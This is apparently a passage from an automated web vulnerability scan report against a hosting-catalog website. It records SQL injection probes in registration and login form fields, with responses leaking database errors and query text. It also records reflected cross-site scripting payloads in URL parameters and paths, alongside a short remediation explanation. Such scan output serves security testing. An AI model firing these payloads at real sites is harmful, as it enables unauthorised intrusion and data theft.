company_name='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=3&province=3&zip=3&country=225&phone=3&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&copy_from_cont=1&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:37:41 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 448 Connection: close Content-Type: text/html; charset=UTF-8 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 1 in SQL SELECT account_id FROM account WHERE company_name=''+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +''
Parameters
Parameter
Type
Value
company_name
POST
Smith
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
3
province
POST
3
zip
POST
3
country
POST
225
phone
POST
3
e_mail
POST
'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
account_type
POST
1
deposit
POST
3
promo_code
POST
3
card_type
POST
1
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
copy_from_cont
POST
1
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 629 Accept-Encoding: gzip, deflate company_name=Smith&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=3&province=3&zip=3&country=225&phone=3&e_mail='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&copy_from_cont=1&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:39:44 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 443 Connection: close Content-Type: text/html; charset=UTF-8 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+' at line 1 in SQL SELECT account_id FROM account WHERE e_mail=''+ (select convert(int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+char(109)+char(109)+char(97)) from syscolumns) +''
Parameters
Parameter
Type
Value
company_name
POST
'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
11
province
POST
3
zip
POST
3
country
POST
12
phone
POST
3
e_mail
POST
netsparker@example.com
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
deposit
POST
3
promo_code
POST
3
card_type
POST
1
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
copy_from_cont
POST
1
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 633 Accept-Encoding: gzip, deflate company_name='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=11&province=3&zip=3&country=12&phone=3&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&copy_from_cont=1&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:58:52 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 448 Connection: close Content-Type: text/html; charset=UTF-8 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 1 in SQL SELECT account_id FROM account WHERE company_name=''+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +''
Parameters
Parameter
Type
Value
company_name
POST
Smith
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
11
province
POST
3
zip
POST
3
country
POST
12
phone
POST
3
e_mail
POST
'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
deposit
POST
3
promo_code
POST
3
card_type
POST
1
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
copy_from_cont
POST
1
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 614 Accept-Encoding: gzip, deflate company_name=Smith&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=11&province=3&zip=3&country=12&phone=3&e_mail='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&copy_from_cont=1&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 14:00:53 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 443 Connection: close Content-Type: text/html; charset=UTF-8 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+' at line 1 in SQL SELECT account_id FROM account WHERE e_mail=''+ (select convert(int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+char(109)+char(109)+char(97)) from syscolumns) +''
Parameters
| Parameter | Type | Value |
| --- | --- | --- |
| company_name | POST | '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +' |
| first_name | POST | Smith |
| last_name | POST | Smith |
| address | POST | 3 |
| address2 | POST | 3 |
| city | POST | 3 |
| state | POST | 11 |
| province | POST | 3 |
| zip | POST | 3 |
| country | POST | 12 |
| phone | POST | 3 |
| e_mail | POST | netsparker@example.com |
| retype_e_mail | POST | netsparker@example.com |
| password | POST | 3 |
| retype_password | POST | 3 |
| deposit | POST | 3 |
| promo_code | POST | 3 |
| card_number | POST | 3 |
| expire_date | POST | 3 |
| owner_first_name | POST | Smith |
| owner_last_name | POST | Smith |
| copy_from_cont | POST | 1 |
| bill_address | POST | 3 |
| bill_address2 | POST | 3 |
| bill_city | POST | 3 |
| bill_state | POST | 3 |
| bill_province | POST | 3 |
| bill_zip | POST | 3 |
| bill_country | POST | 225 |
| bill_phone | POST | 3 |
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 621 Accept-Encoding: gzip, deflate company_name='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=11&province=3&zip=3&country=12&phone=3&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&deposit=3&promo_code=3&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&copy_from_cont=1&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 14:20:39 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 448 Connection: close Content-Type: text/html; charset=UTF-8 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 1 in SQL SELECT account_id FROM account WHERE company_name=''+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +''
Parameters
| Parameter | Type | Value |
| --- | --- | --- |
| company_name | POST | Smith |
| first_name | POST | Smith |
| last_name | POST | Smith |
| address | POST | 3 |
| address2 | POST | 3 |
| city | POST | 3 |
| state | POST | 11 |
| province | POST | 3 |
| zip | POST | 3 |
| country | POST | 12 |
| phone | POST | 3 |
| e_mail | POST | '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +' |
| retype_e_mail | POST | netsparker@example.com |
| password | POST | 3 |
| retype_password | POST | 3 |
| deposit | POST | 3 |
| promo_code | POST | 3 |
| card_number | POST | 3 |
| expire_date | POST | 3 |
| owner_first_name | POST | Smith |
| owner_last_name | POST | Smith |
| copy_from_cont | POST | 1 |
| bill_address | POST | 3 |
| bill_address2 | POST | 3 |
| bill_city | POST | 3 |
| bill_state | POST | 3 |
| bill_province | POST | 3 |
| bill_zip | POST | 3 |
| bill_country | POST | 225 |
| bill_phone | POST | 3 |
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 602 Accept-Encoding: gzip, deflate company_name=Smith&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=11&province=3&zip=3&country=12&phone=3&e_mail='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&deposit=3&promo_code=3&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&copy_from_cont=1&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 14:22:37 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 443 Connection: close Content-Type: text/html; charset=UTF-8 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+' at line 1 in SQL SELECT account_id FROM account WHERE e_mail=''+ (select convert(int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+char(109)+char(109)+char(97)) from syscolumns) +''
Parameters
| Parameter | Type | Value |
| --- | --- | --- |
| temp_check | POST | 755 |
| user_login | POST | '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +' |
| password | POST | 3 |
| form_field | POST | 1 |
Request
POST /advert_login.php HTTP/1.1 Referer: http://www.hostingcatalog.com/advert_login.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 226 Accept-Encoding: gzip, deflate temp_check=755&user_login='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&password=3&form_field=1
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 24 Apr 2011 14:29:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 477 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+' at line 1 in SQL SELECT account_id,password FROM account WHERE e_mail=''+ (select convert(int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+char(109)+char(109)+char(97)) from syscolumns) +'' AND active NOT IN (2,3,4)
Parameters
| Parameter | Type | Value |
| --- | --- | --- |
| temp_check | POST | 755 |
| user_login | POST | '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +' |
| password | POST | 3 |
| remember_both | POST | 1 |
| remember_mail | POST | 1 |
| form_field | POST | 1 |
Request
POST /advert_login.php HTTP/1.1 Referer: http://www.hostingcatalog.com/advert_login.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 258 Accept-Encoding: gzip, deflate temp_check=755&user_login='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&password=3&remember_both=1&remember_mail=1&form_field=1
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 24 Apr 2011 14:35:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 477 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+' at line 1 in SQL SELECT account_id,password FROM account WHERE e_mail=''+ (select convert(int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+char(109)+char(109)+char(97)) from syscolumns) +'' AND active NOT IN (2,3,4)
Parameters
| Parameter | Type | Value |
| --- | --- | --- |
| temp_check | POST | 755 |
| user_login | POST | '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +' |
| password | POST | 3 |
| B1 | POST | Login |
| form_field | POST | 1 |
Request
POST /advert_login.php HTTP/1.1 Referer: http://www.hostingcatalog.com/advert_login.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 235 Accept-Encoding: gzip, deflate temp_check=755&user_login='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&password=3&B1=Login&form_field=1
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 24 Apr 2011 14:40:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 477 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+' at line 1 in SQL SELECT account_id,password FROM account WHERE e_mail=''+ (select convert(int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+char(109)+char(109)+char(97)) from syscolumns) +'' AND active NOT IN (2,3,4)
Cross-site Scripting
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application. This opens several attack opportunities, most commonly hijacking the user's current session or changing the look of the page by rewriting the HTML on the fly to steal the user's credentials. This happens because input entered by a user is interpreted as HTML/JavaScript/VBScript by the browser.
XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of XSS, including:
- Hijacking users' active sessions.
- Changing the look of the page within the victim's browser.
- Mounting a successful phishing attack.
- Intercepting data and performing man-in-the-middle attacks.
The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML, ensure that all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs to be defined only once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well-structured white-list libraries available for many different environments; good examples include the OWASP Reform and Microsoft Anti Cross-site Scripting libraries.
Parameters
| Parameter | Type | Value |
| --- | --- | --- |
| param | GET | '"--></style></script><script>alert(0x00048A)</script> |
Request
GET /notcharged.php?param='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00048A)%3C/script%3E HTTP/1.1 Referer: http://www.hostingcatalog.com/go.php?param=B6C08873592AFA6EF63958F6B4C144A01A3083E8994A616381B1A7B82C26F77190D5EA86683FFE5E0900EF6822A0651ED04A55D302559B9E User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.hostingcatalog.com Cookie: PHPSESSID=ptafq9e5a5qh52n7lhsaof9ea6; time_0=1303646197; user_counted_0=1%3CAND%3E%3CAND%3E24%3CAND%3E66%3CAND%3E101%3CAND%3E43%3CAND%3E46%3CAND%3E65%3CAND%3E77%3CAND%3E26%3CAND%3E29%3CAND%3E28 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 24 Apr 2011 12:24:13 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 357 <html><title>Hosting Catalog</title><body><form method="get" action="http://www.hostingcatalog.com/redir.php" name="redirectForm"> <input type="hidden" name="param" value="'"--></style></script><script>netsparker(0x00048A)</script>"></form><SCRIPT LANGUAGE="JavaScript"><!-- document.forms['redirectForm'].submit();//--></SCRIPT></body></html>
- /file.php/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004CF)%3C/script%3E
Parameters
| Parameter | Type | Value |
| --- | --- | --- |
| URI-BASED | Raw URI | '"--></style></script><script>alert(0x0004CF)</script> |
Request
GET /file.php/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004CF)%3C/script%3E HTTP/1.1 Referer: http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.hostingcatalog.com Cookie: PHPSESSID=ptafq9e5a5qh52n7lhsaof9ea6; time_0=1303646197; user_counted_0=1%3CAND%3E%3CAND%3E24%3CAND%3E66%3CAND%3E101%3CAND%3E43%3CAND%3E46%3CAND%3E65%3CAND%3E77%3CAND%3E26%3CAND%3E29%3CAND%3E28 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 24 Apr 2011 12:24:16 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 338 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0004CF)</script>'' at line 1 in SQL SELECT page_id FROM page WHERE page_name='file.php/'"--></style></script><script>netsparker(0x0004CF)</script>'
- /file.php/advertiseradnetwork.txt'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004DD)%3C/script%3E
Parameters
| Parameter | Type | Value |
| --- | --- | --- |
| URI-BASED | Raw URI | '"--></style></script><script>alert(0x0004DD)</script> |
Request
GET /file.php/advertiseradnetwork.txt'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004DD)%3C/script%3E HTTP/1.1 Referer: http://www.hostingcatalog.com/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.hostingcatalog.com Cookie: PHPSESSID=ptafq9e5a5qh52n7lhsaof9ea6; time_0=1303646197; user_counted_0=1%3CAND%3E%3CAND%3E24%3CAND%3E66%3CAND%3E101%3CAND%3E43%3CAND%3E46%3CAND%3E65%3CAND%3E77%3CAND%3E26%3CAND%3E29%3CAND%3E28 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 24 Apr 2011 12:24:17 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 361 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0004DD)</script>'' at line 1 in SQL SELECT page_id FROM page WHERE page_name='file.php/advertiseradnetwork.txt'"--></style></script><script>netsparker(0x0004DD)</script>'
- /file.php/adnetworkpartnerprogram.txt'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004EE)%3C/script%3E
Parameters
| Parameter | Type | Value |
| --- | --- | --- |
| URI-BASED | Raw URI | '"--></style></script><script>alert(0x0004EE)</script> |
Request
GET /file.php/adnetworkpartnerprogram.txt'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004EE)%3C/script%3E HTTP/1.1 Referer: http://www.hostingcatalog.com/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.hostingcatalog.com Cookie: PHPSESSID=ptafq9e5a5qh52n7lhsaof9ea6; time_0=1303646197; user_counted_0=1%3CAND%3E%3CAND%3E24%3CAND%3E66%3CAND%3E101%3CAND%3E43%3CAND%3E46%3CAND%3E65%3CAND%3E77%3CAND%3E26%3CAND%3E29%3CAND%3E28 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 24 Apr 2011 12:24:19 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 365 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0004EE)</script>'' at line 1 in SQL SELECT page_id FROM page WHERE page_name='file.php/adnetworkpartnerprogram.txt'"--></style></script><script>netsparker(0x0004EE)</script>'
- /file.php/faq.txt'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00072B)%3C/script%3E
Parameters
| Parameter | Type | Value |
